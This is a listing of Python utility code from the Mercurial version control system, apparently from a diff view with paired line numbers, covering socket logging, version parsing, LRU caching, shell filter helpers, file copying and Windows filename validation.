1000 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1001
1002 def settimeout(self, res, value):
1003 if not self.states:
1004 return
1005
1006 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1007
1008 def gettimeout(self, res):
1009 if not self.states:
1010 return
1011
1012 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1013
1014 def setsockopt(self, level, optname, value):
1015 if not self.states:
1016 return
1017
1018 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1019 self.name, level, optname, value))
1020
1021 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1022 logdata=False):
1023 """Turn a socket into a logging socket."""
1024
1025 observer = socketobserver(logh, name, reads=reads, writes=writes,
1026 states=states, logdata=logdata)
1027 return socketproxy(fh, observer)
1028
796 1029 def version():
797 1030 """Return version information if available."""
798 1031 try:
799 1032 from . import __version__
800 1033 return __version__.version
801 1034 except ImportError:
802 1035 return 'unknown'
803 1036
804 1037 def versiontuple(v=None, n=4):
805 1038 """Parses a Mercurial version string into an N-tuple.
806 1039
807 1040 The version string to be parsed is specified with the ``v`` argument.
808 1041 If it isn't defined, the current Mercurial version string will be parsed.
809 1042
810 1043 ``n`` can be 2, 3, or 4. Here is how some version strings map to
811 1044 returned values:
812 1045
813 1046 >>> v = b'3.6.1+190-df9b73d2d444'
814 1047 >>> versiontuple(v, 2)
815 1048 (3, 6)
816 1049 >>> versiontuple(v, 3)
817 1050 (3, 6, 1)
818 1051 >>> versiontuple(v, 4)
819 1052 (3, 6, 1, '190-df9b73d2d444')
820 1053
821 1054 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
822 1055 (3, 6, 1, '190-df9b73d2d444+20151118')
823 1056
824 1057 >>> v = b'3.6'
825 1058 >>> versiontuple(v, 2)
826 1059 (3, 6)
827 1060 >>> versiontuple(v, 3)
828 1061 (3, 6, None)
829 1062 >>> versiontuple(v, 4)
830 1063 (3, 6, None, None)
831 1064
832 1065 >>> v = b'3.9-rc'
833 1066 >>> versiontuple(v, 2)
834 1067 (3, 9)
835 1068 >>> versiontuple(v, 3)
836 1069 (3, 9, None)
837 1070 >>> versiontuple(v, 4)
838 1071 (3, 9, None, 'rc')
839 1072
840 1073 >>> v = b'3.9-rc+2-02a8fea4289b'
841 1074 >>> versiontuple(v, 2)
842 1075 (3, 9)
843 1076 >>> versiontuple(v, 3)
844 1077 (3, 9, None)
845 1078 >>> versiontuple(v, 4)
846 1079 (3, 9, None, 'rc+2-02a8fea4289b')
847 1080 """
848 1081 if not v:
849 1082 v = version()
850 1083 parts = remod.split('[\+-]', v, 1)
851 1084 if len(parts) == 1:
852 1085 vparts, extra = parts[0], None
853 1086 else:
854 1087 vparts, extra = parts
855 1088
856 1089 vints = []
857 1090 for i in vparts.split('.'):
858 1091 try:
859 1092 vints.append(int(i))
860 1093 except ValueError:
861 1094 break
862 1095 # (3, 6) -> (3, 6, None)
863 1096 while len(vints) < 3:
864 1097 vints.append(None)
865 1098
866 1099 if n == 2:
867 1100 return (vints[0], vints[1])
868 1101 if n == 3:
869 1102 return (vints[0], vints[1], vints[2])
870 1103 if n == 4:
871 1104 return (vints[0], vints[1], vints[2], extra)
872 1105
873 1106 def cachefunc(func):
874 1107 '''cache the result of function calls'''
875 1108 # XXX doesn't handle keywords args
876 1109 if func.__code__.co_argcount == 0:
877 1110 cache = []
878 1111 def f():
879 1112 if len(cache) == 0:
880 1113 cache.append(func())
881 1114 return cache[0]
882 1115 return f
883 1116 cache = {}
884 1117 if func.__code__.co_argcount == 1:
885 1118 # we gain a small amount of time because
886 1119 # we don't need to pack/unpack the list
887 1120 def f(arg):
888 1121 if arg not in cache:
889 1122 cache[arg] = func(arg)
890 1123 return cache[arg]
891 1124 else:
892 1125 def f(*args):
893 1126 if args not in cache:
894 1127 cache[args] = func(*args)
895 1128 return cache[args]
896 1129
897 1130 return f
898 1131
899 1132 class cow(object):
900 1133 """helper class to make copy-on-write easier
901 1134
902 1135 Call preparewrite before doing any writes.
903 1136 """
904 1137
905 1138 def preparewrite(self):
906 1139 """call this before writes, return self or a copied new object"""
907 1140 if getattr(self, '_copied', 0):
908 1141 self._copied -= 1
909 1142 return self.__class__(self)
910 1143 return self
911 1144
912 1145 def copy(self):
913 1146 """always do a cheap copy"""
914 1147 self._copied = getattr(self, '_copied', 0) + 1
915 1148 return self
916 1149
917 1150 class sortdict(collections.OrderedDict):
918 1151 '''a simple sorted dictionary
919 1152
920 1153 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
921 1154 >>> d2 = d1.copy()
922 1155 >>> d2
923 1156 sortdict([('a', 0), ('b', 1)])
924 1157 >>> d2.update([(b'a', 2)])
925 1158 >>> list(d2.keys()) # should still be in last-set order
926 1159 ['b', 'a']
927 1160 '''
928 1161
929 1162 def __setitem__(self, key, value):
930 1163 if key in self:
931 1164 del self[key]
932 1165 super(sortdict, self).__setitem__(key, value)
933 1166
934 1167 if pycompat.ispypy:
935 1168 # __setitem__() isn't called as of PyPy 5.8.0
936 1169 def update(self, src):
937 1170 if isinstance(src, dict):
938 1171 src = src.iteritems()
939 1172 for k, v in src:
940 1173 self[k] = v
941 1174
942 1175 class cowdict(cow, dict):
943 1176 """copy-on-write dict
944 1177
945 1178 Be sure to call d = d.preparewrite() before writing to d.
946 1179
947 1180 >>> a = cowdict()
948 1181 >>> a is a.preparewrite()
949 1182 True
950 1183 >>> b = a.copy()
951 1184 >>> b is a
952 1185 True
953 1186 >>> c = b.copy()
954 1187 >>> c is a
955 1188 True
956 1189 >>> a = a.preparewrite()
957 1190 >>> b is a
958 1191 False
959 1192 >>> a is a.preparewrite()
960 1193 True
961 1194 >>> c = c.preparewrite()
962 1195 >>> b is c
963 1196 False
964 1197 >>> b is b.preparewrite()
965 1198 True
966 1199 """
967 1200
968 1201 class cowsortdict(cow, sortdict):
969 1202 """copy-on-write sortdict
970 1203
971 1204 Be sure to call d = d.preparewrite() before writing to d.
972 1205 """
973 1206
974 1207 class transactional(object):
975 1208 """Base class for making a transactional type into a context manager."""
976 1209 __metaclass__ = abc.ABCMeta
977 1210
978 1211 @abc.abstractmethod
979 1212 def close(self):
980 1213 """Successfully closes the transaction."""
981 1214
982 1215 @abc.abstractmethod
983 1216 def release(self):
984 1217 """Marks the end of the transaction.
985 1218
986 1219 If the transaction has not been closed, it will be aborted.
987 1220 """
988 1221
989 1222 def __enter__(self):
990 1223 return self
991 1224
992 1225 def __exit__(self, exc_type, exc_val, exc_tb):
993 1226 try:
994 1227 if exc_type is None:
995 1228 self.close()
996 1229 finally:
997 1230 self.release()
998 1231
999 1232 @contextlib.contextmanager
1000 1233 def acceptintervention(tr=None):
1001 1234 """A context manager that closes the transaction on InterventionRequired
1002 1235
1003 1236 If no transaction was provided, this simply runs the body and returns
1004 1237 """
1005 1238 if not tr:
1006 1239 yield
1007 1240 return
1008 1241 try:
1009 1242 yield
1010 1243 tr.close()
1011 1244 except error.InterventionRequired:
1012 1245 tr.close()
1013 1246 raise
1014 1247 finally:
1015 1248 tr.release()
1016 1249
1017 1250 @contextlib.contextmanager
1018 1251 def nullcontextmanager():
1019 1252 yield
1020 1253
1021 1254 class _lrucachenode(object):
1022 1255 """A node in a doubly linked list.
1023 1256
1024 1257 Holds a reference to nodes on either side as well as a key-value
1025 1258 pair for the dictionary entry.
1026 1259 """
1027 1260 __slots__ = (u'next', u'prev', u'key', u'value')
1028 1261
1029 1262 def __init__(self):
1030 1263 self.next = None
1031 1264 self.prev = None
1032 1265
1033 1266 self.key = _notset
1034 1267 self.value = None
1035 1268
1036 1269 def markempty(self):
1037 1270 """Mark the node as emptied."""
1038 1271 self.key = _notset
1039 1272
1040 1273 class lrucachedict(object):
1041 1274 """Dict that caches most recent accesses and sets.
1042 1275
1043 1276 The dict consists of an actual backing dict - indexed by original
1044 1277 key - and a doubly linked circular list defining the order of entries in
1045 1278 the cache.
1046 1279
1047 1280 The head node is the newest entry in the cache. If the cache is full,
1048 1281 we recycle head.prev and make it the new head. Cache accesses result in
1049 1282 the node being moved to before the existing head and being marked as the
1050 1283 new head node.
1051 1284 """
1052 1285 def __init__(self, max):
1053 1286 self._cache = {}
1054 1287
1055 1288 self._head = head = _lrucachenode()
1056 1289 head.prev = head
1057 1290 head.next = head
1058 1291 self._size = 1
1059 1292 self._capacity = max
1060 1293
1061 1294 def __len__(self):
1062 1295 return len(self._cache)
1063 1296
1064 1297 def __contains__(self, k):
1065 1298 return k in self._cache
1066 1299
1067 1300 def __iter__(self):
1068 1301 # We don't have to iterate in cache order, but why not.
1069 1302 n = self._head
1070 1303 for i in range(len(self._cache)):
1071 1304 yield n.key
1072 1305 n = n.next
1073 1306
1074 1307 def __getitem__(self, k):
1075 1308 node = self._cache[k]
1076 1309 self._movetohead(node)
1077 1310 return node.value
1078 1311
1079 1312 def __setitem__(self, k, v):
1080 1313 node = self._cache.get(k)
1081 1314 # Replace existing value and mark as newest.
1082 1315 if node is not None:
1083 1316 node.value = v
1084 1317 self._movetohead(node)
1085 1318 return
1086 1319
1087 1320 if self._size < self._capacity:
1088 1321 node = self._addcapacity()
1089 1322 else:
1090 1323 # Grab the last/oldest item.
1091 1324 node = self._head.prev
1092 1325
1093 1326 # At capacity. Kill the old entry.
1094 1327 if node.key is not _notset:
1095 1328 del self._cache[node.key]
1096 1329
1097 1330 node.key = k
1098 1331 node.value = v
1099 1332 self._cache[k] = node
1100 1333 # And mark it as newest entry. No need to adjust order since it
1101 1334 # is already self._head.prev.
1102 1335 self._head = node
1103 1336
1104 1337 def __delitem__(self, k):
1105 1338 node = self._cache.pop(k)
1106 1339 node.markempty()
1107 1340
1108 1341 # Temporarily mark as newest item before re-adjusting head to make
1109 1342 # this node the oldest item.
1110 1343 self._movetohead(node)
1111 1344 self._head = node.next
1112 1345
1113 1346 # Additional dict methods.
1114 1347
1115 1348 def get(self, k, default=None):
1116 1349 try:
1117 1350 return self._cache[k].value
1118 1351 except KeyError:
1119 1352 return default
1120 1353
1121 1354 def clear(self):
1122 1355 n = self._head
1123 1356 while n.key is not _notset:
1124 1357 n.markempty()
1125 1358 n = n.next
1126 1359
1127 1360 self._cache.clear()
1128 1361
1129 1362 def copy(self):
1130 1363 result = lrucachedict(self._capacity)
1131 1364 n = self._head.prev
1132 1365 # Iterate in oldest-to-newest order, so the copy has the right ordering
1133 1366 for i in range(len(self._cache)):
1134 1367 result[n.key] = n.value
1135 1368 n = n.prev
1136 1369 return result
1137 1370
1138 1371 def _movetohead(self, node):
1139 1372 """Mark a node as the newest, making it the new head.
1140 1373
1141 1374 When a node is accessed, it becomes the freshest entry in the LRU
1142 1375 list, which is denoted by self._head.
1143 1376
1144 1377 Visually, let's make ``N`` the new head node (* denotes head):
1145 1378
1146 1379 previous/oldest <-> head <-> next/next newest
1147 1380
1148 1381 ----<->--- A* ---<->-----
1149 1382 | |
1150 1383 E <-> D <-> N <-> C <-> B
1151 1384
1152 1385 To:
1153 1386
1154 1387 ----<->--- N* ---<->-----
1155 1388 | |
1156 1389 E <-> D <-> C <-> B <-> A
1157 1390
1158 1391 This requires the following moves:
1159 1392
1160 1393 C.next = D (node.prev.next = node.next)
1161 1394 D.prev = C (node.next.prev = node.prev)
1162 1395 E.next = N (head.prev.next = node)
1163 1396 N.prev = E (node.prev = head.prev)
1164 1397 N.next = A (node.next = head)
1165 1398 A.prev = N (head.prev = node)
1166 1399 """
1167 1400 head = self._head
1168 1401 # C.next = D
1169 1402 node.prev.next = node.next
1170 1403 # D.prev = C
1171 1404 node.next.prev = node.prev
1172 1405 # N.prev = E
1173 1406 node.prev = head.prev
1174 1407 # N.next = A
1175 1408 # It is tempting to do just "head" here, however if node is
1176 1409 # adjacent to head, this will do bad things.
1177 1410 node.next = head.prev.next
1178 1411 # E.next = N
1179 1412 node.next.prev = node
1180 1413 # A.prev = N
1181 1414 node.prev.next = node
1182 1415
1183 1416 self._head = node
1184 1417
1185 1418 def _addcapacity(self):
1186 1419 """Add a node to the circular linked list.
1187 1420
1188 1421 The new node is inserted before the head node.
1189 1422 """
1190 1423 head = self._head
1191 1424 node = _lrucachenode()
1192 1425 head.prev.next = node
1193 1426 node.prev = head.prev
1194 1427 node.next = head
1195 1428 head.prev = node
1196 1429 self._size += 1
1197 1430 return node
1198 1431
1199 1432 def lrucachefunc(func):
1200 1433 '''cache most recent results of function calls'''
1201 1434 cache = {}
1202 1435 order = collections.deque()
1203 1436 if func.__code__.co_argcount == 1:
1204 1437 def f(arg):
1205 1438 if arg not in cache:
1206 1439 if len(cache) > 20:
1207 1440 del cache[order.popleft()]
1208 1441 cache[arg] = func(arg)
1209 1442 else:
1210 1443 order.remove(arg)
1211 1444 order.append(arg)
1212 1445 return cache[arg]
1213 1446 else:
1214 1447 def f(*args):
1215 1448 if args not in cache:
1216 1449 if len(cache) > 20:
1217 1450 del cache[order.popleft()]
1218 1451 cache[args] = func(*args)
1219 1452 else:
1220 1453 order.remove(args)
1221 1454 order.append(args)
1222 1455 return cache[args]
1223 1456
1224 1457 return f
1225 1458
1226 1459 class propertycache(object):
1227 1460 def __init__(self, func):
1228 1461 self.func = func
1229 1462 self.name = func.__name__
1230 1463 def __get__(self, obj, type=None):
1231 1464 result = self.func(obj)
1232 1465 self.cachevalue(obj, result)
1233 1466 return result
1234 1467
1235 1468 def cachevalue(self, obj, value):
1236 1469 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1237 1470 obj.__dict__[self.name] = value
1238 1471
1239 1472 def clearcachedproperty(obj, prop):
1240 1473 '''clear a cached property value, if one has been set'''
1241 1474 if prop in obj.__dict__:
1242 1475 del obj.__dict__[prop]
1243 1476
1244 1477 def pipefilter(s, cmd):
1245 1478 '''filter string S through command CMD, returning its output'''
1246 1479 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1247 1480 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1248 1481 pout, perr = p.communicate(s)
1249 1482 return pout
1250 1483
1251 1484 def tempfilter(s, cmd):
1252 1485 '''filter string S through a pair of temporary files with CMD.
1253 1486 CMD is used as a template to create the real command to be run,
1254 1487 with the strings INFILE and OUTFILE replaced by the real names of
1255 1488 the temporary files generated.'''
1256 1489 inname, outname = None, None
1257 1490 try:
1258 1491 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1259 1492 fp = os.fdopen(infd, r'wb')
1260 1493 fp.write(s)
1261 1494 fp.close()
1262 1495 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1263 1496 os.close(outfd)
1264 1497 cmd = cmd.replace('INFILE', inname)
1265 1498 cmd = cmd.replace('OUTFILE', outname)
1266 1499 code = os.system(cmd)
1267 1500 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1268 1501 code = 0
1269 1502 if code:
1270 1503 raise Abort(_("command '%s' failed: %s") %
1271 1504 (cmd, explainexit(code)))
1272 1505 return readfile(outname)
1273 1506 finally:
1274 1507 try:
1275 1508 if inname:
1276 1509 os.unlink(inname)
1277 1510 except OSError:
1278 1511 pass
1279 1512 try:
1280 1513 if outname:
1281 1514 os.unlink(outname)
1282 1515 except OSError:
1283 1516 pass
1284 1517
1285 1518 filtertable = {
1286 1519 'tempfile:': tempfilter,
1287 1520 'pipe:': pipefilter,
1288 1521 }
1289 1522
1290 1523 def filter(s, cmd):
1291 1524 "filter a string through a command that transforms its input to its output"
1292 1525 for name, fn in filtertable.iteritems():
1293 1526 if cmd.startswith(name):
1294 1527 return fn(s, cmd[len(name):].lstrip())
1295 1528 return pipefilter(s, cmd)
1296 1529
1297 1530 def binary(s):
1298 1531 """return true if a string is binary data"""
1299 1532 return bool(s and '\0' in s)
1300 1533
1301 1534 def increasingchunks(source, min=1024, max=65536):
1302 1535 '''return no less than min bytes per chunk while data remains,
1303 1536 doubling min after each chunk until it reaches max'''
1304 1537 def log2(x):
1305 1538 if not x:
1306 1539 return 0
1307 1540 i = 0
1308 1541 while x:
1309 1542 x >>= 1
1310 1543 i += 1
1311 1544 return i - 1
1312 1545
1313 1546 buf = []
1314 1547 blen = 0
1315 1548 for chunk in source:
1316 1549 buf.append(chunk)
1317 1550 blen += len(chunk)
1318 1551 if blen >= min:
1319 1552 if min < max:
1320 1553 min = min << 1
1321 1554 nmin = 1 << log2(blen)
1322 1555 if nmin > min:
1323 1556 min = nmin
1324 1557 if min > max:
1325 1558 min = max
1326 1559 yield ''.join(buf)
1327 1560 blen = 0
1328 1561 buf = []
1329 1562 if buf:
1330 1563 yield ''.join(buf)
1331 1564
1332 1565 Abort = error.Abort
1333 1566
1334 1567 def always(fn):
1335 1568 return True
1336 1569
1337 1570 def never(fn):
1338 1571 return False
1339 1572
1340 1573 def nogc(func):
1341 1574 """disable garbage collector
1342 1575
1343 1576 Python's garbage collector triggers a GC each time a certain number of
1344 1577 container objects (the number being defined by gc.get_threshold()) are
1345 1578 allocated even when marked not to be tracked by the collector. Tracking has
1346 1579 no effect on when GCs are triggered, only on what objects the GC looks
1347 1580 into. As a workaround, disable GC while building complex (huge)
1348 1581 containers.
1349 1582
1350 1583 This garbage collector issue have been fixed in 2.7. But it still affect
1351 1584 CPython's performance.
1352 1585 """
1353 1586 def wrapper(*args, **kwargs):
1354 1587 gcenabled = gc.isenabled()
1355 1588 gc.disable()
1356 1589 try:
1357 1590 return func(*args, **kwargs)
1358 1591 finally:
1359 1592 if gcenabled:
1360 1593 gc.enable()
1361 1594 return wrapper
1362 1595
1363 1596 if pycompat.ispypy:
1364 1597 # PyPy runs slower with gc disabled
1365 1598 nogc = lambda x: x
1366 1599
1367 1600 def pathto(root, n1, n2):
1368 1601 '''return the relative path from one place to another.
1369 1602 root should use os.sep to separate directories
1370 1603 n1 should use os.sep to separate directories
1371 1604 n2 should use "/" to separate directories
1372 1605 returns an os.sep-separated path.
1373 1606
1374 1607 If n1 is a relative path, it's assumed it's
1375 1608 relative to root.
1376 1609 n2 should always be relative to root.
1377 1610 '''
1378 1611 if not n1:
1379 1612 return localpath(n2)
1380 1613 if os.path.isabs(n1):
1381 1614 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1382 1615 return os.path.join(root, localpath(n2))
1383 1616 n2 = '/'.join((pconvert(root), n2))
1384 1617 a, b = splitpath(n1), n2.split('/')
1385 1618 a.reverse()
1386 1619 b.reverse()
1387 1620 while a and b and a[-1] == b[-1]:
1388 1621 a.pop()
1389 1622 b.pop()
1390 1623 b.reverse()
1391 1624 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1392 1625
1393 1626 def mainfrozen():
1394 1627 """return True if we are a frozen executable.
1395 1628
1396 1629 The code supports py2exe (most common, Windows only) and tools/freeze
1397 1630 (portable, not much used).
1398 1631 """
1399 1632 return (safehasattr(sys, "frozen") or # new py2exe
1400 1633 safehasattr(sys, "importers") or # old py2exe
1401 1634 imp.is_frozen(u"__main__")) # tools/freeze
1402 1635
1403 1636 # the location of data files matching the source code
1404 1637 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1405 1638 # executable version (py2exe) doesn't support __file__
1406 1639 datapath = os.path.dirname(pycompat.sysexecutable)
1407 1640 else:
1408 1641 datapath = os.path.dirname(pycompat.fsencode(__file__))
1409 1642
1410 1643 i18n.setdatapath(datapath)
1411 1644
1412 1645 _hgexecutable = None
1413 1646
1414 1647 def hgexecutable():
1415 1648 """return location of the 'hg' executable.
1416 1649
1417 1650 Defaults to $HG or 'hg' in the search path.
1418 1651 """
1419 1652 if _hgexecutable is None:
1420 1653 hg = encoding.environ.get('HG')
1421 1654 mainmod = sys.modules[r'__main__']
1422 1655 if hg:
1423 1656 _sethgexecutable(hg)
1424 1657 elif mainfrozen():
1425 1658 if getattr(sys, 'frozen', None) == 'macosx_app':
1426 1659 # Env variable set by py2app
1427 1660 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1428 1661 else:
1429 1662 _sethgexecutable(pycompat.sysexecutable)
1430 1663 elif (os.path.basename(
1431 1664 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1432 1665 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1433 1666 else:
1434 1667 exe = findexe('hg') or os.path.basename(sys.argv[0])
1435 1668 _sethgexecutable(exe)
1436 1669 return _hgexecutable
1437 1670
1438 1671 def _sethgexecutable(path):
1439 1672 """set location of the 'hg' executable"""
1440 1673 global _hgexecutable
1441 1674 _hgexecutable = path
1442 1675
1443 1676 def _testfileno(f, stdf):
1444 1677 fileno = getattr(f, 'fileno', None)
1445 1678 try:
1446 1679 return fileno and fileno() == stdf.fileno()
1447 1680 except io.UnsupportedOperation:
1448 1681 return False # fileno() raised UnsupportedOperation
1449 1682
1450 1683 def isstdin(f):
1451 1684 return _testfileno(f, sys.__stdin__)
1452 1685
1453 1686 def isstdout(f):
1454 1687 return _testfileno(f, sys.__stdout__)
1455 1688
1456 1689 def shellenviron(environ=None):
1457 1690 """return environ with optional override, useful for shelling out"""
1458 1691 def py2shell(val):
1459 1692 'convert python object into string that is useful to shell'
1460 1693 if val is None or val is False:
1461 1694 return '0'
1462 1695 if val is True:
1463 1696 return '1'
1464 1697 return pycompat.bytestr(val)
1465 1698 env = dict(encoding.environ)
1466 1699 if environ:
1467 1700 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1468 1701 env['HG'] = hgexecutable()
1469 1702 return env
1470 1703
1471 1704 def system(cmd, environ=None, cwd=None, out=None):
1472 1705 '''enhanced shell command execution.
1473 1706 run with environment maybe modified, maybe in different dir.
1474 1707
1475 1708 if out is specified, it is assumed to be a file-like object that has a
1476 1709 write() method. stdout and stderr will be redirected to out.'''
1477 1710 try:
1478 1711 stdout.flush()
1479 1712 except Exception:
1480 1713 pass
1481 1714 cmd = quotecommand(cmd)
1482 1715 env = shellenviron(environ)
1483 1716 if out is None or isstdout(out):
1484 1717 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1485 1718 env=env, cwd=cwd)
1486 1719 else:
1487 1720 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1488 1721 env=env, cwd=cwd, stdout=subprocess.PIPE,
1489 1722 stderr=subprocess.STDOUT)
1490 1723 for line in iter(proc.stdout.readline, ''):
1491 1724 out.write(line)
1492 1725 proc.wait()
1493 1726 rc = proc.returncode
1494 1727 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1495 1728 rc = 0
1496 1729 return rc
1497 1730
1498 1731 def checksignature(func):
1499 1732 '''wrap a function with code to check for calling errors'''
1500 1733 def check(*args, **kwargs):
1501 1734 try:
1502 1735 return func(*args, **kwargs)
1503 1736 except TypeError:
1504 1737 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1505 1738 raise error.SignatureError
1506 1739 raise
1507 1740
1508 1741 return check
1509 1742
1510 1743 # a whilelist of known filesystems where hardlink works reliably
1511 1744 _hardlinkfswhitelist = {
1512 1745 'btrfs',
1513 1746 'ext2',
1514 1747 'ext3',
1515 1748 'ext4',
1516 1749 'hfs',
1517 1750 'jfs',
1518 1751 'NTFS',
1519 1752 'reiserfs',
1520 1753 'tmpfs',
1521 1754 'ufs',
1522 1755 'xfs',
1523 1756 'zfs',
1524 1757 }
1525 1758
1526 1759 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1527 1760 '''copy a file, preserving mode and optionally other stat info like
1528 1761 atime/mtime
1529 1762
1530 1763 checkambig argument is used with filestat, and is useful only if
1531 1764 destination file is guarded by any lock (e.g. repo.lock or
1532 1765 repo.wlock).
1533 1766
1534 1767 copystat and checkambig should be exclusive.
1535 1768 '''
1536 1769 assert not (copystat and checkambig)
1537 1770 oldstat = None
1538 1771 if os.path.lexists(dest):
1539 1772 if checkambig:
1540 1773 oldstat = checkambig and filestat.frompath(dest)
1541 1774 unlink(dest)
1542 1775 if hardlink:
1543 1776 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1544 1777 # unless we are confident that dest is on a whitelisted filesystem.
1545 1778 try:
1546 1779 fstype = getfstype(os.path.dirname(dest))
1547 1780 except OSError:
1548 1781 fstype = None
1549 1782 if fstype not in _hardlinkfswhitelist:
1550 1783 hardlink = False
1551 1784 if hardlink:
1552 1785 try:
1553 1786 oslink(src, dest)
1554 1787 return
1555 1788 except (IOError, OSError):
1556 1789 pass # fall back to normal copy
1557 1790 if os.path.islink(src):
1558 1791 os.symlink(os.readlink(src), dest)
1559 1792 # copytime is ignored for symlinks, but in general copytime isn't needed
1560 1793 # for them anyway
1561 1794 else:
1562 1795 try:
1563 1796 shutil.copyfile(src, dest)
1564 1797 if copystat:
1565 1798 # copystat also copies mode
1566 1799 shutil.copystat(src, dest)
1567 1800 else:
1568 1801 shutil.copymode(src, dest)
1569 1802 if oldstat and oldstat.stat:
1570 1803 newstat = filestat.frompath(dest)
1571 1804 if newstat.isambig(oldstat):
1572 1805 # stat of copied file is ambiguous to original one
1573 1806 advanced = (
1574 1807 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1575 1808 os.utime(dest, (advanced, advanced))
1576 1809 except shutil.Error as inst:
1577 1810 raise Abort(str(inst))
1578 1811
1579 1812 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1580 1813 """Copy a directory tree using hardlinks if possible."""
1581 1814 num = 0
1582 1815
1583 1816 gettopic = lambda: hardlink and _('linking') or _('copying')
1584 1817
1585 1818 if os.path.isdir(src):
1586 1819 if hardlink is None:
1587 1820 hardlink = (os.stat(src).st_dev ==
1588 1821 os.stat(os.path.dirname(dst)).st_dev)
1589 1822 topic = gettopic()
1590 1823 os.mkdir(dst)
1591 1824 for name, kind in listdir(src):
1592 1825 srcname = os.path.join(src, name)
1593 1826 dstname = os.path.join(dst, name)
1594 1827 def nprog(t, pos):
1595 1828 if pos is not None:
1596 1829 return progress(t, pos + num)
1597 1830 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1598 1831 num += n
1599 1832 else:
1600 1833 if hardlink is None:
1601 1834 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1602 1835 os.stat(os.path.dirname(dst)).st_dev)
1603 1836 topic = gettopic()
1604 1837
1605 1838 if hardlink:
1606 1839 try:
1607 1840 oslink(src, dst)
1608 1841 except (IOError, OSError):
1609 1842 hardlink = False
1610 1843 shutil.copy(src, dst)
1611 1844 else:
1612 1845 shutil.copy(src, dst)
1613 1846 num += 1
1614 1847 progress(topic, num)
1615 1848 progress(topic, None)
1616 1849
1617 1850 return hardlink, num
1618 1851
1619 1852 _winreservednames = {
1620 1853 'con', 'prn', 'aux', 'nul',
1621 1854 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1622 1855 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1623 1856 }
1624 1857 _winreservedchars = ':*?"<>|'
1625 1858 def checkwinfilename(path):
1626 1859 r'''Check that the base-relative path is a valid filename on Windows.
1627 1860 Returns None if the path is ok, or a UI string describing the problem.
1628 1861
1629 1862 >>> checkwinfilename(b"just/a/normal/path")
1630 1863 >>> checkwinfilename(b"foo/bar/con.xml")
1631 1864 "filename contains 'con', which is reserved on Windows"
1632 1865 >>> checkwinfilename(b"foo/con.xml/bar")
1633 1866 "filename contains 'con', which is reserved on Windows"
1634 1867 >>> checkwinfilename(b"foo/bar/xml.con")
1635 1868 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1636 1869 "filename contains 'AUX', which is reserved on Windows"
1637 1870 >>> checkwinfilename(b"foo/bar/bla:.txt")
1638 1871 "filename contains ':', which is reserved on Windows"
1639 1872 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1640 1873 "filename contains '\\x07', which is invalid on Windows"
1641 1874 >>> checkwinfilename(b"foo/bar/bla ")
1642 1875 "filename ends with ' ', which is not allowed on Windows"
1643 1876 >>> checkwinfilename(b"../bar")
1644 1877 >>> checkwinfilename(b"foo\\")
1645 1878 "filename ends with '\\', which is invalid on Windows"
1646 1879 >>> checkwinfilename(b"foo\\/bar")
1647 1880 "directory name ends with '\\', which is invalid on Windows"
1648 1881 '''
1649 1882 if path.endswith('\\'):
1650 1883 return _("filename ends with '\\', which is invalid on Windows")
1651 1884 if '\\/' in path:
1652 1885 return _("directory name ends with '\\', which is invalid on Windows")
1653 1886 for n in path.replace('\\', '/').split('/'):
1654 1887 if not n:
1655 1888 continue
1656 1889 for c in _filenamebytestr(n):
1657 1890 if c in _winreservedchars:
1658 1891 return _("filename contains '%s', which is reserved "
1659 1892 "on Windows") % c
1660 1893 if ord(c) <= 31:
1661 1894 return _("filename contains '%s', which is invalid "
1662 1895 "on Windows") % escapestr(c)
1663 1896 base = n.split('.')[0]
1664 1897 if base and base.lower() in _winreservednames:
1665 1898 return _("filename contains '%s', which is reserved "
1666 1899 "on Windows") % base
1667 1900 t = n[-1:]
1668 1901 if t in '. ' and n not in '..':
1669 1902 return _("filename ends with '%s', which is not allowed "
1670 1903 "on Windows") % t
1671 1904
1672 1905 if pycompat.iswindows:
1673 1906 checkosfilename = checkwinfilename
1674 1907 timer = time.clock
1675 1908 else:
1676 1909 checkosfilename = platform.checkosfilename
1677 1910 timer = time.time
1678 1911
1679 1912 if safehasattr(time, "perf_counter"):
1680 1913 timer = time.perf_counter
1681 1914
1682 1915 def makelock(info, pathname):
1683 1916 """Create a lock file atomically if possible
1684 1917
1685 1918 This may leave a stale lock file if symlink isn't supported and signal
1686 1919 interrupt is enabled.
1687 1920 """
1688 1921 try:
1689 1922 return os.symlink(info, pathname)
1690 1923 except OSError as why:
1691 1924 if why.errno == errno.EEXIST:
1692 1925 raise
1693 1926 except AttributeError: # no symlink in os
1694 1927 pass
1695 1928
